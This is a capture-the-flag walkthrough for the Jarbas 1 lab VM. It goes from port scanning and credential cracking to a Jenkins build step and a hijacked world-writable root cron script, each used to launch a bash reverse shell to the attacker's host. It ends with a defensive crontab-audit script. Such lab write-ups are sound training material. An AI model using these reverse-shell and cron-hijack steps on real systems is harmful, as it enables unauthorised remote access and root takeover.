• VM: Jarbas 1
  • Goal: Obtain root shell
  • Approach: solve without automated exploitation tools

Target Discovery

nmap -sn 192.168.172.200-254
target discovery
Our target: 192.168.172.238

Port Scanning

nmap -p- -A 192.168.172.238
port scanning
  • Port 22: OpenSSH 7.4
  • Port 80: Apache httpd 2.4.6
  • Port 3306: mysql (MariaDB)
  • port 8080: http (Jetty 9.4.z-SNAPSHOT)

Enumeration

First, I browsed the main website, which turned up nothing of interest. All links point to web.archive.org, and robots.txt does not list any hidden directories.

homepage at port 80

Next, I looked at the web server on port 8080. It is running Jenkins version 2.113 and requires a login before you can do anything.

I tried some SQL injection techniques, but it looks like the login is not vulnerable to SQL injection.

I then checked the MySQL service on port 3306, but the connection is not allowed.

test mysql connection

Nothing so far. I then ran dirb and nikto against both web servers, hoping to find something interesting, but unfortunately these scans gave no additional information.

Oh well, I checked all the ports without finding anything useful. I then proceeded to look for vulnerabilities in Apache 2.4.6, Jetty 9.4.z and Jenkins 2.113 using searchsploit and Google, and tried several exploits, to no avail.

Kinda got stuck. I went back to probe the web servers to see if I had overlooked something. Finally, I got some extra information by running dirb with the -X flag:

dirb http://192.168.172.238 -X .php,.htm,.html

Exploitation

Checking access.html, I did indeed find some interesting information.

password hashes

All right, it looks like we have some usernames and password hashes. Each hash is 32 hex characters, so they look like MD5. We recovered the passwords using the online website md5decrypt.net.

  • tiago: italia99
  • trindade: marianna
  • eder: vipsu

Nice, three passwords to use. First things first, I tried them on SSH (port 22) to see if I got lucky. No luck. I then tried the username/password pairs on the website at port 8080, and eder/vipsu lets me log in.

Jenkins logged in

Jenkins is new to me, so I browsed around to see what is available, particularly whether I can upload files and execute them. Under Manage Jenkins > Configure System there is a setting for Shell executable, which seems like a good hint that I can execute shell commands.

shell executable

So I googled and researched Jenkins some more. Sure enough, I found that the build process allows shell execution, so I can make use of that to run a reverse shell.

  • click New Item
  • type any name at Enter an item name
  • select Freestyle project
  • click OK

It will create a new project and show project screen:

  • scroll down to Build section
  • click Add build step > Execute Shell
  • enter command: /bin/bash -i >& /dev/tcp/192.168.172.110/4444 0>&1
  • click Save

Note that 192.168.172.110 is my Kali box. Also, the target system does not have Netcat, so I am using a bash reverse shell here. Now it is time to catch the reverse shell:

  • at kali box: run nc -lp 4444
  • at browser: click Build Now

Boom! First foothold. The shell is a little hard to use, as it echoes whatever characters I type, but I am in as user jenkins.

limited shell

Privilege Escalation

The next step is to become root. I started looking around the system for possible privilege escalation methods. sudo doesn't work, and there are no more passwords lying around. But crontab gave me the answer:

crontab

A cron job running every 5 minutes executes /etc/script/CleaningScript.sh as root, and /etc/script/CleaningScript.sh is world writable. Awesome.

All I need to do is add another reverse shell to CleaningScript.sh:

  • at kali box: start another Terminal
  • at kali box: nc -lp 4443
  • at limited shell: echo " /bin/bash -i >& /dev/tcp/192.168.172.110/4443 0>&1 " >> /etc/script/CleaningScript.sh

modify cron job

Once the reverse shell command is in the script, all we need to do is wait a few minutes.
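From the defender's side, the root cause here is a root cron job pointing at a world-writable script. As an added example (not part of the original walkthrough), the bash function below audits a crontab in system format and flags every root-run script whose "others" write bit is set; the demo crontab and script files it creates are constructed.

```bash
#!/bin/bash
# Added example, not from the walkthrough: find cron jobs that run as
# root from a script that any local user could modify.

# Reads a crontab in system format (min hour dom mon dow user command),
# prints "WARN <path>" for root-run scripts that are world-writable and
# "OK   <path>" otherwise. Returns the number of WARN lines (0 = clean).
audit_cron_file() {
  local crontab_file="$1" findings=0
  local min hour dom mon dow user cmd rest
  while read -r min hour dom mon dow user cmd rest; do
    case "$min" in ''|'#'*) continue ;; esac          # blank or comment
    if [ "${min#@}" != "$min" ]; then                 # @reboot, @daily, ...
      user=$hour; cmd=$dom
    fi
    [ "$user" = root ] && [ -f "$cmd" ] || continue   # only root-run files
    # find prints the path only when the "others" write bit is set
    if [ -n "$(find "$cmd" -maxdepth 0 -perm -o=w)" ]; then
      echo "WARN $cmd runs as root but is world-writable"
      findings=$((findings + 1))
    else
      echo "OK   $cmd"
    fi
  done < "$crontab_file"
  return "$findings"
}

# Constructed demo: a throwaway crontab with one safe and one risky script.
demo_dir=$(mktemp -d)
printf '#!/bin/sh\necho clean\n' > "$demo_dir/safe.sh"
chmod 750 "$demo_dir/safe.sh"
printf '#!/bin/sh\necho clean\n' > "$demo_dir/CleaningScript.sh"
chmod 777 "$demo_dir/CleaningScript.sh"
cat > "$demo_dir/crontab" <<EOF
# constructed system crontab
*/5 * * * * root $demo_dir/CleaningScript.sh
0 3 * * * root $demo_dir/safe.sh
EOF
rc=0
audit_cron_file "$demo_dir/crontab" || rc=$?
echo "risky entries: $rc"
rm -rf "$demo_dir"
```

Run it against /etc/crontab or files under /etc/cron.d; a non-zero return means at least one root job can be hijacked by a non-root user.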

root shell

Capture the flag

captured the flag

Takeaway for me: use the -X flag when doing a dirb scan.

Thank you to the author, Tiago Tavares, for the box Jarbas: 1.
